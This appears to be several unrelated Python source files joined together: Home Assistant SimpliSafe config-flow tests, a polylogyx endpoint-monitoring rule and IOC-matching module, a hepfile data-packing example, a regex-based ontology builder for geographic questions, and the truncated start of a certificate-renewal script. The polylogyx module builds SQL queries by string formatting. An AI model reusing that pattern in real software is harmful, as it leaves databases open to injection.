CONF_PASSWORD: "password",
CONF_CODE: "1234",
}
MockConfigEntry(
domain=DOMAIN,
unique_id="<EMAIL>",
data={CONF_USERNAME: "<EMAIL>", CONF_TOKEN: "<PASSWORD>", CONF_CODE: "1234"},
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}, data=conf
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "already_configured"
async def test_invalid_credentials(hass):
"""Test that invalid credentials throws an error."""
conf = {CONF_USERNAME: "<EMAIL>", CONF_PASSWORD: "password"}
with patch(
"simplipy.API.login_via_credentials",
side_effect=InvalidCredentialsError,
):
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}, data=conf
)
assert result["errors"] == {"base": "invalid_credentials"}
async def test_options_flow(hass):
"""Test config flow options."""
conf = {CONF_USERNAME: "<EMAIL>", CONF_PASSWORD: "password"}
config_entry = MockConfigEntry(
domain=DOMAIN,
unique_id="abcde12345",
data=conf,
options={CONF_CODE: "1234"},
)
config_entry.add_to_hass(hass)
with patch(
"homeassistant.components.simplisafe.async_setup_entry", return_value=True
):
result = await hass.config_entries.options.async_init(config_entry.entry_id)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "init"
result = await hass.config_entries.options.async_configure(
result["flow_id"], user_input={CONF_CODE: "4321"}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert config_entry.options == {CONF_CODE: "4321"}
async def test_show_form(hass):
"""Test that the form is served with no input."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_IMPORT}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "user"
async def test_step_import(hass):
"""Test that the import step works."""
conf = {
CONF_USERNAME: "<EMAIL>",
CONF_PASSWORD: "password",
CONF_CODE: "1234",
}
with patch(
"homeassistant.components.simplisafe.async_setup_entry", return_value=True
), patch("simplipy.API.login_via_credentials", return_value=mock_api()):
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}, data=conf
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<EMAIL>"
assert result["data"] == {
CONF_USERNAME: "<EMAIL>",
CONF_TOKEN: "<PASSWORD>",
CONF_CODE: "1234",
}
async def test_step_reauth(hass):
"""Test that the reauth step works."""
MockConfigEntry(
domain=DOMAIN,
unique_id="<EMAIL>",
data={CONF_USERNAME: "<EMAIL>", CONF_TOKEN: "<PASSWORD>", CONF_CODE: "1234"},
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": "reauth"},
data={CONF_CODE: "1234", CONF_USERNAME: "<EMAIL>"},
)
assert result["step_id"] == "reauth_confirm"
result = await hass.config_entries.flow.async_configure(result["flow_id"])
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth_confirm"
with patch(
"homeassistant.components.simplisafe.async_setup_entry", return_value=True
), patch("simplipy.API.login_via_credentials", return_value=mock_api()):
result = await hass.config_entries.flow.async_configure(
result["flow_id"], user_input={CONF_PASSWORD: "password"}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "reauth_successful"
assert len(hass.config_entries.async_entries()) == 1
async def test_step_user(hass):
"""Test that the user step works (without MFA)."""
conf = {
CONF_USERNAME: "<EMAIL>",
CONF_PASSWORD: "password",
CONF_CODE: "1234",
}
with patch(
"homeassistant.components.simplisafe.async_setup_entry", return_value=True
), patch("simplipy.API.login_via_credentials", return_value=mock_api()):
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}, data=conf
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<EMAIL>"
assert result["data"] == {
CONF_USERNAME: "<EMAIL>",
CONF_TOKEN: "<PASSWORD>",
CONF_CODE: "1234",
}
async def test_step_user_mfa(hass):
"""Test that the user step works when MFA is in the middle."""
conf = {
CONF_USERNAME: "<EMAIL>",
CONF_PASSWORD: "password",
CONF_CODE: "1234",
}
with patch(
"simplipy.API.login_via_credentials", side_effect=PendingAuthorizationError
):
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}, data=conf
)
assert result["step_id"] == "mfa"
with patch(
"simplipy.API.login_via_credentials", side_effect=PendingAuthorizationError
):
# Simulate the user pressing the MFA submit button without having clicked
# the link in the MFA email:
result = await hass.config_entries.flow.async_configure(
result["flow_id"], user_input={}
)
assert result["step_id"] == "mfa"
with patch(
"homeassistant.components.simplisafe.async_setup_entry", return_value=True
), patch("simplipy.API.login_via_credentials", return_value=mock_api()):
result = await hass.config_entries.flow.async_configure(
result["flow_id"], user_input={}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "<EMAIL>"
assert result["data"] == {
CONF_USERNAME: "<EMAIL>",
CONF_TOKEN: "<PASSWORD>",
CONF_CODE: "1234",
}
async def test_unknown_error(hass):
"""Test that an unknown error raises the correct error."""
conf = {CONF_USERNAME: "<EMAIL>", CONF_PASSWORD: "password"}
with patch(
"simplipy.API.login_via_credentials",
side_effect=SimplipyError,
):
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}, data=conf
)
assert result["errors"] == {"base": "unknown"}
|
# -*- coding: utf-8 -*-
import datetime as dt
import os
import re
from flask import current_app
from flask_bcrypt import Bcrypt
from flask_caching import Cache
from flask_mail import Mail
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy
from flask_wtf.csrf import CsrfProtect
from raven import Client
from raven.contrib.celery import register_logger_signal, register_signal
class LogTee(object):
def __init__(self, app=None):
self.app = app
self.plugins = []
if app is not None:
self.init_app(app)
def init_app(self, app):
from importlib import import_module
from polylogyx.plugins import AbstractLogsPlugin
plugins = []
all_plugins_obj = app.config.get("POLYLOGYX_LOG_PLUGINS_OBJ", {})
if (
os.environ.get("RSYSLOG_FORWARDING")
and os.environ.get("RSYSLOG_FORWARDING") == "true"
and "rsyslog" in all_plugins_obj
):
plugins.append(all_plugins_obj["rsyslog"])
for plugin in plugins:
package, classname = plugin.rsplit(".", 1)
module = import_module(package)
klass = getattr(module, classname, None)
if klass is None:
raise ValueError('Could not find a class named "{0}" in package "{1}"'.format(classname, package))
if not issubclass(klass, AbstractLogsPlugin):
raise ValueError("{0} is not a subclass of AbstractLogsPlugin".format(klass))
self.plugins.append(klass(app.config))
def handle_status(self, data, **kwargs):
for plugin in self.plugins:
plugin.handle_status(data, **kwargs)
def handle_result(self, data, **kwargs):
for plugin in self.plugins:
plugin.handle_result(data, **kwargs)
def handle_recon(self, data, **kwargs):
for plugin in self.plugins:
plugin.handle_recon(data, **kwargs)
class RuleManager(object):
def __init__(self, app=None):
self.network = None
self.last_update = None
if app is not None:
self.init_app(app)
def init_app(self, app):
self.app = app
self.load_alerters()
# Save this instance on the app, so we have a way to get at it.
app.rule_manager = self
def load_alerters(self):
"""Load the alerter plugin(s) specified in the app config."""
from importlib import import_module
from polylogyx.plugins import AbstractAlerterPlugin
alerters = self.app.config.get("POLYLOGYX_ALERTER_PLUGINS", {})
self.alerters = {}
for name, (plugin, config) in alerters.items():
package, classname = plugin.rsplit(".", 1)
module = import_module(package)
klass = getattr(module, classname, None)
if klass is None:
raise ValueError('Could not find a class named "{0}" in package "{1}"'.format(classname, package))
if not issubclass(klass, AbstractAlerterPlugin):
raise ValueError("{0} is not a subclass of AbstractAlerterPlugin".format(name))
self.alerters[name] = klass(config)
def should_reload_rules(self):
"""Checks if we need to reload the set of rules."""
from polylogyx.db.models import Rule
if self.last_update is None:
return True
newest_rule = Rule.query.order_by(Rule.updated_at.desc()).limit(1).first()
if newest_rule and self.last_update < newest_rule.updated_at:
return True
return False
def load_ioc_intels(self):
from polylogyx.db.models import IOCIntel
self.all_ioc_intels = list(IOCIntel.query.all())
if not self.all_ioc_intels:
return
def load_rules(self):
"""Load rules from the database."""
from polylogyx.db.models import Rule
from polylogyx.utils.rules import Network
if not self.should_reload_rules():
return
print("before getting rules")
all_rules = list(Rule.query.filter(Rule.status != "INACTIVE").all())
print("after getting rules")
print("all rules - ", all_rules)
self.network = Network()
if not all_rules:
return
for rule in all_rules:
# Verify the alerters
for alerter in rule.alerters:
if alerter not in self.alerters:
current_app.logger.error('No such alerter: "{0}"'.format(alerter))
# raise ValueError('No such alerter: "{0}"'.format(alerter))
# Create the rule.
try:
self.network.parse_query(
rule.conditions, alerters=rule.alerters, rule_id=rule.id, platform=rule.platform
)
except Exception as e:
current_app.logger.error(rule.id)
# Save the last updated date
# Note: we do this here, and not in should_reload_rules, because it's
# possible that we've reloaded a rule in between the two functions, and
# thus we accidentally don't reload when we should.
self.last_update = max(r.updated_at for r in all_rules)
def check_for_ioc_matching(self, name, columns, node, uuid, capture_column):
flag = False
for intel in self.all_ioc_intels:
if capture_column == intel.type and columns[capture_column].lower() == intel.value.lower():
from polylogyx.utils.intel import save_intel_alert
flag = True
save_intel_alert(
data={},
source="ioc",
query_name=name,
severity=intel.severity,
uuid=uuid,
columns=columns,
node_id=node["id"],
)
current_app.logger.info(
"Found an event with existing indicator with type '{0}', value '{1}' from the node '{2}'".format(
capture_column, columns[capture_column], node
)
)
break
return flag
def check_for_ioc_matching_opt(self, name, columns, node, uuid, capture_column):
from polylogyx.db.models import IOCIntel
from sqlalchemy import func
from polylogyx.utils.intel import save_intel_alert
intel=IOCIntel.query.with_entities(IOCIntel.severity)\
.filter(IOCIntel.type==capture_column)\
.filter(func.lower(IOCIntel.value)==columns[capture_column].lower())\
.first()
if intel:
save_intel_alert(
data={},
source="ioc",
query_name=name,
severity=intel[0],
uuid=uuid,
columns=columns,
node_id=node["id"],
)
current_app.logger.info(
"Found an event with existing indicator with type '{0}', value '{1}' from the node '{2}'".format(
capture_column, columns[capture_column], node
))
return True
return False
def check_for_iocs(self, name, columns, node, uuid,vt_setting=None):
current_app.logger.debug("Scanning for IOCs of Node '{0}' from the results: \n{1}".format(node, columns))
try:
from polylogyx.constants import IOC_COLUMNS, TO_CAPTURE_COLUMNS
from polylogyx.db.models import ResultLog, ResultLogScan,Settings
self.ioc_match_opt = current_app.config.get('HIGH_INTEL_VOLUME', False)
for capture_column in IOC_COLUMNS:
if capture_column in columns and columns[capture_column]:
if self.ioc_match_opt:
ioc_match=self.check_for_ioc_matching_opt(name, columns, node, uuid, capture_column)
else:
ioc_match=self.check_for_ioc_matching(name, columns, node, uuid, capture_column)
current_app.logger.info(
"columns captured".format(
capture_column, node, columns[capture_column]
)
)
if capture_column in TO_CAPTURE_COLUMNS:
result_log_scan = ResultLogScan.query.filter(
ResultLogScan.scan_value == columns[capture_column]
).first()
if result_log_scan:
if vt_setting:
since = dt.datetime.utcnow() - dt.timedelta(hours=24 * int(vt_setting.setting))
if result_log_scan.vt_updated_at and result_log_scan.vt_updated_at < since:
newReputations = {}
result_log_scan.update(reputations=newReputations)
if not result_log_scan:
from polylogyx.db.models import ResultLogScan
current_app.logger.info(
"Found a new '{0}' indicator on Node '{1}' to be scanned with value '{2}'".format(
capture_column, node, columns[capture_column]
)
)
result_log_scan = ResultLogScan.create(
scan_value=columns[capture_column], scan_type=capture_column, reputations={}
)
#result_log = ResultLog.query.filter(ResultLog.uuid == uuid).first()
#result_log_scan.result_logs.append(result_log)
result_log = db.session.execute("select id from result_log where uuid='{0}'".format(uuid)).first()
r_id = result_log[0]
db.session.execute('insert into result_log_maps (result_log_id,result_log_scan_id) values ({0},{1})'.format(r_id,result_log_scan.id))
db.session.commit()
if ioc_match:
break
except Exception as e:
current_app.logger.error("Unable to scan for IOCs - {}".format(e))
def handle_log_entry(self, entry, node):
"""The actual entrypoint for handling input log entries."""
from polylogyx.db.models import Rule, Settings
from polylogyx.utils.rules import RuleMatch
current_app.logger.debug("Loading Rules and IOCs if not loaded yet...")
self.load_rules()
self.ioc_match_opt = current_app.config.get('HIGH_INTEL_VOLUME', False)
if not self.ioc_match_opt:
self.load_ioc_intels()
to_trigger = []
vt_setting = Settings.query.filter(Settings.name == 'vt_scan_retention_period').first()
for result in entry:
self.check_for_iocs(result["name"], result["columns"], node, result["uuid"],vt_setting)
alerts = self.network.process(result, node)
if len(alerts) == 0:
continue
# Alerts is a set of (alerter name, rule id) tuples. We convert
# these into RuleMatch instances, which is what our alerters are
# actually expecting.
for rule_id, alerters in alerts.items():
rule = Rule.get_by_id(rule_id)
to_trigger.append(
(
alerters,
RuleMatch(rule=rule, result=result, node=node, alert_id=0),
)
)
# Now that we've collected all results, start triggering them.
alert_aggr_duration_setting = Settings.query.filter(Settings.name == "alert_aggregation_duration").first()
if alert_aggr_duration_setting:
alert_aggr_duration = int(alert_aggr_duration_setting.setting)
else:
alert_aggr_duration = 60
for alerters, match in to_trigger:
alert = self.save_in_db(match.result, match.node, match.rule, alert_aggr_duration)
node["alert"] = alert
for alerter in alerters:
match = match._replace(alert_id=alert.id)
self.alerters[alerter].handle_alert(node, match, None)
def save_in_db(self, result_log_dict, node, rule, alert_aggr_duration):
from polylogyx.db.models import AlertLog, Alerts
existing_alert = (
Alerts.query.filter(Alerts.node_id == node["id"])
.filter(Alerts.rule_id == rule.id)
.filter((dt.datetime.utcnow() - Alerts.created_at) <= dt.timedelta(seconds=alert_aggr_duration))
.first()
)
if existing_alert:
AlertLog.create(
name=result_log_dict["name"],
timestamp=result_log_dict["timestamp"],
action=result_log_dict["action"],
columns=result_log_dict["columns"],
alert_id=existing_alert.id,
result_log_uuid=result_log_dict["uuid"],
)
db.session.commit()
current_app.logger.debug("Aggregating the Alert with ID {0}..".format(existing_alert.id))
return existing_alert
else:
alerts_obj = Alerts(
message=result_log_dict["columns"],
query_name=result_log_dict["name"],
result_log_uid=result_log_dict["uuid"],
node_id=node["id"],
rule_id=rule.id,
type=Alerts.RULE,
source="rule",
source_data={},
recon_queries=rule.recon_queries,
severity=rule.severity,
)
alerts_obj = alerts_obj.save(alerts_obj)
AlertLog.create(
name=result_log_dict["name"],
timestamp=result_log_dict["timestamp"],
action=result_log_dict["action"],
columns=result_log_dict["columns"],
alert_id=alerts_obj.id,
result_log_uuid=result_log_dict["uuid"],
)
db.session.commit()
current_app.logger.debug("Creating a new Alert with ID {0}..".format(alerts_obj.id))
return alerts_obj
class ThreatIntelManager(object):
def __init__(self, app=None):
self.network = None
self.last_update = None
if app is not None:
self.init_app(app)
def init_app(self, app):
self.app = app
self.load_intels()
# Save this instance on the app, so we have a way to get at it.
app.threat_intel = self
def load_intels(self):
"""Load the alerter plugin(s) specified in the app config."""
from importlib import import_module
from polylogyx.plugins import AbstractIntelPlugin
intels = self.app.config.get("POLYLOGYX_THREAT_INTEL_PLUGINS", {})
self.intels = {}
for name, (plugin, config) in intels.items():
package, classname = plugin.rsplit(".", 1)
module = import_module(package)
klass = getattr(module, classname, None)
if klass is None:
raise ValueError('Could not find a class named "{0}" in package "{1}"'.format(classname, package))
if not issubclass(klass, AbstractIntelPlugin):
raise ValueError("{0} is not a subclass of AbstractAlerterPlugin".format(name))
self.intels[name] = klass(config)
def analyse_hash(self, value, type, node):
"""The actual entrypoint for handling input log entries."""
for key, value_elem in self.intels.items():
try:
value_elem.analyse_hash(value, type, node)
except Exception as e:
current_app.logger.error(e)
def analyse_pending_hashes(self):
"""The actual entrypoint for handling input log entries."""
for key, value_elem in self.intels.items():
try:
value_elem.analyse_pending_hashes()
except Exception as e:
current_app.logger.error(e)
def generate_alerts(self):
"""The actual entrypoint for handling input log entries."""
for key, value_elem in self.intels.items():
try:
value_elem.generate_alerts()
except Exception as e:
current_app.logger.error(e)
def analyse_domain(self, value, type, node):
"""The actual entrypoint for handling input log entries."""
for key, value_elem in self.intels.items():
value_elem.analyse_hash(value, type, node)
def update_credentials(self):
"""The actual entrypoint for handling input log entries."""
self.load_intels()
for key, value_elem in self.intels.items():
value_elem.update_credentials()
def create_distributed_query(node, query_str, alert, query_name, match):
from polylogyx.db.models import DistributedQuery, DistributedQueryTask, Node
try:
data = match.result["columns"]
results = re.findall("#!([^\s]+)!#", query_str, re.MULTILINE)
query_valid = True
for result in results:
if result not in data:
query_valid = False
break
else:
value = data[result]
query_str = query_str.replace("#!" + result + "!#", value)
if query_valid:
query = DistributedQuery.create(sql=query_str, alert_id=alert.id, description=query_name)
node_obj = Node.query.filter_by(id=node["id"]).first_or_404()
task = DistributedQueryTask(node=node_obj, save_results_in_db=True, distributed_query=query)
db.session.add(task)
db.session.commit()
except Exception as e:
current_app.logger.error(e)
return
def make_celery(app, celery):
"""From http://flask.pocoo.org/docs/0.10/patterns/celery/"""
# Register our custom serializer type before updating the configuration.
from kombu.serialization import register
from polylogyx.celery.celery_serializer import djson_dumps, djson_loads
register(
"djson",
djson_dumps,
djson_loads,
content_type="application/x-djson",
content_encoding="utf-8",
)
# Actually update the config
celery.config_from_object(app.config)
TaskBase = celery.Task
class ContextTask(TaskBase):
abstract = True
def __call__(self, *args, **kwargs):
with app.app_context():
return TaskBase.__call__(self, *args, **kwargs)
celery.Task = ContextTask
return celery
bcrypt = Bcrypt()
csrf = CsrfProtect()
db = SQLAlchemy()
mail = Mail()
migrate = Migrate()
log_tee = LogTee()
rule_manager = RuleManager()
threat_intel = ThreatIntelManager()
#cache = Cache(config={"CACHE_TYPE": "filesystem",'CACHE_DIR': '/src/cache'})
cache = Cache() |
<reponame>mattbellis/hepfile
import numpy as np
import hepfile as hep
people = np.loadtxt('sheet1.csv', unpack=True, dtype=str,
delimiter=",")
#with open('sheet2.csv') as input:
# cols = input.read().split('\n')
# for col in cols:
# print(len(col.split(',')))
vehicles = np.loadtxt('sheet2.csv', unpack=True, dtype=str,
delimiter=",", comments = '$')
houses = np.loadtxt('sheet3.csv', unpack=True, dtype=str,
delimiter=",", comments = '$')
people_ID = people[0][1:].astype(np.int32)
vehicles_ID = vehicles[0][1:].astype(np.int32)
houses_ID = houses[0][1:].astype(np.int32)
town = hep.initialize()
hep.create_group(town, 'people', counter ='ID')
hep.create_group(town, 'vehicles', counter='ID')
#hep.create_group(town, 'houses')
hep.create_dataset(town, ['First name','Last name','Gender ID',
'Highest degree-grade'], group = 'people', dtype = str)
hep.create_dataset(town, ['Age', 'Height', 'Yearly Income'], group = 'people', dtype = int)
hep.create_dataset(town, ['Type of vehicle','Gas-electric-human powered'], group = 'vehicles', dtype = str)
hep.create_dataset(town, ['# of riders', 'Year', 'Cost'], group = 'vehicles', dtype = int)
hep.create_dataset(town, ['House-apartment-condo'], dtype = str)
hep.create_dataset(town, ['# of bedrooms', 'Square footage','Year built',
'Estimate'], dtype = int)
hep.create_dataset(town, '# of bathrooms', dtype = float)
bucket = hep.create_single_bucket(town)
for i in range(0,4):
for j in range(len(people_ID)):
if people_ID[j] == i:
bucket['people/First name'].append(people[1, j+1])
bucket['people/Last name'].append(people[2, j+1])
bucket['people/Gender ID'].append(people[3, j+1])
bucket['people/Age'].append(people[4, j+1].astype(np.int32))
bucket['people/Height'].append(people[5, j+1].astype(np.int32))
bucket['people/Yearly Income'].append(people[6, j+1].astype(np.int32))
bucket['people/Highest degree-grade'].append(people[6, j+1])
bucket['people/ID'] += 1
for j in range(len(vehicles_ID)):
if vehicles_ID[j] == i:
bucket['vehicles/Type of vehicle'].append(vehicles[1, j+1])
bucket['vehicles/# of riders'].append(vehicles[2, j+1].astype(np.int32))
bucket['vehicles/Gas-electric-human powered'].append(vehicles[3, j+1])
bucket['vehicles/Year'].append(vehicles[4, j+1].astype(np.int32))
bucket['vehicles/Cost'].append(vehicles[5, j+1].astype(np.int32))
bucket['vehicles/ID'] += 1
bucket['House-apartment-condo'] = houses[1, i+1]
bucket['# of bedrooms'] = houses[2, i+1].astype(np.int32)
bucket['# of bathrooms'] = houses[3, i+1].astype(np.float32)
bucket['Square footage'] = houses[4, i+1].astype(np.int32)
bucket['Year built'] = houses[5, i+1].astype(np.int32)
bucket['Estimate'] = houses[6, i+1].astype(np.int32)
hep.pack(town, bucket)
hep.write_to_file('town_hep_long.hdf5', town,force_single_precision=False)
|
<gh_stars>0
# [TODO] complex object extents: between, of-on, to-for, for-to
# [TODO] how to parse sentences that contain if
#!/usr/bin/env python
from owlready2 import *
import owlready2
owlready2.JAVA_EXE = "C:\\Program Files (x86)\\Java\\jre1.8.0_221\\bin\\java.exe"
import re
import csv
def prulars_to_singular(my_str):
my_str = re.sub('ies$', 'y', my_str)
my_str = re.sub('s$', '', my_str)
return my_str
def what_raw_questions(corpusId = "GeoAnQu", corpusLabel = "QuAnGIS corpus of geo-analytic questions", corpusNS = "qac"):
with open(f"{corporaDir}\\{corpusId}.txt", 'r') as datacsvfile:
datacsvreader = csv.DictReader(datacsvfile, delimiter=';')
# [SC] writes detected intent to this file as table with intent and question id
with open(f"{dataOutputDir}\\{corpusNS}_what_raw_intents.csv", 'w', newline='') as intentcsvfile:
intentfieldnames = ['intent', 'qid']
intentwriter = csv.DictWriter(intentcsvfile, fieldnames=intentfieldnames)
intentwriter.writeheader()
with open(f"{dataOutputDir}\\{corpusNS}_what_raw_objects.csv", 'w', newline='') as objcsvfile:
objfieldnames = ['intent', 'relation', 'object', 'distance', 'qid']
objwriter = csv.DictWriter(objcsvfile, fieldnames=objfieldnames)
objwriter.writeheader()
with open(f"{dataOutputDir}\\{corpusNS}_what_raw_adjectives.csv", 'w', newline='') as adjcsvfile:
adjfieldnames = ['intent', 'adjective', 'distance', 'qid']
adjwriter = csv.DictWriter(adjcsvfile, fieldnames=adjfieldnames)
adjwriter.writeheader()
with open(f"{dataOutputDir}\\{corpusNS}_what_raw_extents.csv", 'w', newline='') as extentcsvfile:
extentfieldnames = ['relation', 'extent', 'qid']
extentwriter = csv.DictWriter(extentcsvfile, fieldnames=extentfieldnames)
extentwriter.writeheader()
# [SC] create Corpus individual for the ontology
corpusIndiv = onto.Corpus(corpusId)
corpusIndiv.label = corpusLabel
counter = 0
qidStr = "c("
for q in datacsvreader:
intentResult = intentMatcher.search(q['Question'])
if intentResult:
intentwriter.writerow({
'intent': intentResult.group('intent')
, 'qid': q['ID']
})
# [SC] create Question individual
questionIndiv = onto.Question(f"{corpusNS}-{q['ID']}")
questionIndiv.label = q['Question']
# [SC] connect Question and Corpus
corpusIndiv.hasQuestion.append(questionIndiv)
# [SC] create IntentPhrase individual for the ontology
intentPhraseIndiv = onto.IntentPhrase(f"{corpusNS}-{q['ID']}-{intentResult.group('adjective')}{intentResult.group('intent')}")
intentPhraseIndiv.label = f"{intentResult.group('adjective')}{intentResult.group('intent')}"
# [SC] connect IntentPhrase and Question
questionIndiv.hasPhrase.append(intentPhraseIndiv)
# [SC] create Intent individual for the ontology; no need to check for duplicates
intentStr = prulars_to_singular(intentResult.group('intent'))
intentIndiv = onto.Intent(f"i-{intentStr}")
intentIndiv.label = intentStr
# [SC] connect IntentPhrase and Intent
intentPhraseIndiv.hasIntent.append(intentIndiv)
if intentResult.group('adjective'):
# [SC] write to file the entire adjective phrase at first
adjwriter.writerow({
'intent': intentResult.group('intent')
, 'adjective': intentResult.group('adjective')
, 'distance': 0
, 'qid': q['ID']
})
# [SC] extract and save to a file individual adjective words from the phrase
subResults = subMatcher.findall(intentResult.group('adjective'))
for adjCount in range(len(subResults)):
if subResults[adjCount] not in nonobjects:
adjwriter.writerow({
'intent': intentResult.group('intent')
, 'adjective': subResults[adjCount]
, 'distance': len(subResults) - adjCount
, 'qid': q['ID']
})
# [SC] create Adjective individual for the ontology
adjStr = prulars_to_singular(subResults[adjCount])
adjIndiv = onto.Adjective(f"a-{adjStr}")
adjIndiv.label = adjStr
# [SC] connect Intent and Adjective
intentIndiv.modifiedBy.append(adjIndiv)
# [SC] connect IntentPhrase and Adjective
intentPhraseIndiv.hasWord.append(adjIndiv)
extentResult = extentMatcher.search(intentResult.group('rightside'))
if extentResult:
extentwriter.writerow({
'relation': extentResult.group('relation').strip()
, 'extent': extentResult.group('extent').strip()
, 'qid': q['ID']
})
if extentResult.group('objectphrase'):
simpleObjResult = simpleObjMatcher.search(extentResult.group('objectphrase'))
# [SC] write to file the entire object phrase at first
objwriter.writerow({
'intent': intentResult.group('intent')
, 'relation': simpleObjResult.group('relation').replace(' ', '')
, 'object': simpleObjResult.group('object')
, 'distance': 0
, 'qid': q['ID']
})
# [SC] create IntentPhrase individual for the ontology
objPhraseIndiv = onto.ObjectPhrase(f"{corpusNS}-{q['ID']}-{simpleObjResult.group('relation')}{simpleObjResult.group('object')}")
objPhraseIndiv.label = f"{simpleObjResult.group('relation')}{simpleObjResult.group('object')}"
# [SC] connect IntentPhrase and ObjectPhrase
intentPhraseIndiv.before.append(objPhraseIndiv)
# [SC] connect ObjectPhrase and Question
questionIndiv.hasPhrase.append(objPhraseIndiv)
# [SC] create ObjectRelation individual
objRelationIndiv = onto.ObjectRelation(simpleObjResult.group('relation').strip())
objRelationIndiv.label = simpleObjResult.group('relation').strip()
# [SC] connect ObjectPhrase and ObjectRelation
objPhraseIndiv.hasRelation.append(objRelationIndiv)
# [SC] connect Intent and ObjectRelation
intentIndiv.followedBy.append(objRelationIndiv)
objIndiv = None
# [SC] extract and save to a file individual object words from the phrase
subResults = subMatcher.findall(simpleObjResult.group('object'))
for objectCount in reversed(range(len(subResults))):
if subResults[objectCount] not in nonobjects:
objwriter.writerow({
'intent': intentResult.group('intent')
, 'relation': simpleObjResult.group('relation').replace(' ', '')
, 'object': subResults[objectCount]
, 'distance': len(subResults) - objectCount
, 'qid': q['ID']
})
if (len(subResults) - objectCount == 1):
# [SC] create Object individual
objStr = prulars_to_singular(subResults[objectCount])
objIndiv = onto.Object(f"o-{objStr}")
objIndiv.label = objStr
# [SC] connect ObjectPhrase and Object
objPhraseIndiv.hasObject.append(objIndiv)
# [SC] connect ObjectRelation and Object
objIndiv.precededBy.append(objRelationIndiv)
# [SC] connect Intent and Object
intentIndiv.targets.append(objIndiv)
else:
# [SC] create Adjective individual for the ontology
adjStr = prulars_to_singular(subResults[objectCount])
adjIndiv = onto.Adjective(f"a-{adjStr}")
adjIndiv.label = adjStr
# [SC] connect Object and Adjective
objIndiv.modifiedBy.append(adjIndiv)
# [SC] connect ObjectPhrase and Adjective
objPhraseIndiv.hasWord.append(adjIndiv)
qidStr += f"{q['ID']},"
counter += 1
print(counter)
print(qidStr)
if __name__ == '__main__':
# [SC] folder with input corpora
corporaDir = "inputCorpora"
# [SC] data output folder
dataOutputDir = "outputData"
# [SC] load the ontology schema
onto_path.append(corporaDir)
onto = get_ontology("SpatialQuestionPatternOntology_schema.owl")
onto.load()
nonobjects = ('and', ',', '-', 'a', 'the', ')', '(')
subExpress = "\S+"
subMatcher = re.compile(subExpress, re.IGNORECASE)
intentExpr = (
"What " # required wh start (case insensitive)
+ "(is|are|were|was|do|does|did|have|has|should|could|would|will) (be )?" # required auxiliary
+ "(the |a )?" # optional article
+ "(?P<adjective>(.*?))" # lazy matching any zero or more chars
+ "(?P<intent>\S+)" # any non-white space char
+ "(?P<rightside> (across|along|among|around|at|based on|based upon|between|by|for|from|given|if|in|inside|of|on|over|per|since|that|to|with|within) (.+))"
)
intentMatcher = re.compile(intentExpr, re.IGNORECASE)
extentExpr = (
"(?P<objectphrase>.*?)"
+ "(?P<relation> (across|along|among|around|at|between|by|for|from|in|inside|of|on|per|to|within)) "
+ "(?P<extent>((?! (across|along|among|around|at|between|by|for|from|in|inside|of|on|per|to|within) ).)*)$"
)
extentMatcher = re.compile(extentExpr, re.IGNORECASE)
simpleObjExp = (
"(?P<relation>(across|along|among|around|at|based on|based upon|between|by|for|from|given|in|inside|of|on|over|per|since|that|to|with|within) )"
+ "("
+ "(?P<object>(.*?))" # lazy matching any zero or more chars
+ "("
+ "(?= (across|along|among|around|at|between|by|for|from|given|if|in|inside|like|of|on|over|per|such|that|to|when|where|which|with|within) )" # positive lookahead
+ "|$"
+ ")"
+ ")?" # the entire pattern should occur 0 or 1 time
)
simpleObjMatcher = re.compile(simpleObjExp, re.IGNORECASE)
with onto:
# [SC] run analysis on the GeoAnQu corpus
what_raw_questions()
# [SC] run analysis on the MSMARCO corpus
what_raw_questions("MSMARCO", "MSMARCO dataset", "msm")
# [SC] run analysis on the GeoQuestions201 corpus
#what_raw_questions("Geo201", "GeoQuestions201 dataset", "g201")
onto.save(f"{dataOutputDir}\\SpatialQuestionPatternOntology.owl") |
#!/usr/bin/env python3
import argparse
import glob
import hashlib
import logging
import OpenSSL
import os
import random
import requests
import sys
import textwrap
import time
import yaml
from datetime import datetime
__author__ = '<NAME>'
__copyright__ = 'Copyright 2017, <NAME>'
__credits__ = ['<NAME>']
__license__ = 'MIT'
__version__ = '1.0.0'
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
__status__ = 'Production'
# Install logger part
LOGGER = logging.getLogger(__name__)
LOGGER.addHandler(logging.StreamHandler())
LOGGER.setLevel(logging.INFO)
# Hardcoded acme-tiny repository
AT_GIT_URL = 'https://github.com/diafygi/acme-tiny.git'
class X509Parser():
'''
Module to parse certificate files
'''
def __init__(self, filename, validity_need=30, generate=False):
self.filename = filename
self.validity_need = validity_need
self.generate = generate
self.content = ''.join(open(self.filename).readlines())
x509_cert = OpenSSL.crypto.load_certificate(
OpenSSL.crypto.FILETYPE_PEM,
self.content)
self.subject = x509_cert.get_subject().get_components()[0][1]
self.not_after = x509_cert.get_notAfter()
self.update_validity_in_days()
def __str__(self):
return 'subject: {}, not_after: {}: validity_in_days: {}'.format(
self.subject,
self.not_after,
self.validity_in_days)
def update_validity_in_days(self):
try:
as_timestamp = time.strptime(str(self.not_after)[2:10], '%Y%m%d')
validity_limit = datetime.fromtimestamp(time.mktime(as_timestamp))
now = datetime.utcnow()
